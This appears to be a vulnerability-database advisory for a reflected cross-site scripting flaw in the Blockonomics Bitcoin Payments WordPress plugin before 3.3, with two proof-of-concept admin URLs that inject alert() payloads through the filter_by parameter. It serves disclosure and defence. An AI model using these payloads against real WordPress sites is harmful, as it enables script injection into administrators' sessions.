WordPress Plugin Vulnerabilities
WordPress Bitcoin Payments - Blockonomics < 3.3 - Reflected Cross-Site Scripting (XSS)
Description
The plugin does not properly sanitise its filter action when viewing Orders before outputting it back in an attribute, leading to a reflected Cross-Site Scripting vulnerability.
Proof of Concept
v <= 3.2 - https://example.com/wp-admin/edit.php?post_type=shop_order&filter_by=%22autofocus+onfocus%3Dalert%28%2FXSS%2F%29%2F%2F v < 3.2 - https://example.com/wp-admin/edit.php?post_type=shop_order&filter_by="><script>alert(/XSS/)</script>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-01 (about 2 years ago)
Added
2021-07-01 (about 2 years ago)
Last Updated
2021-07-01 (about 2 years ago)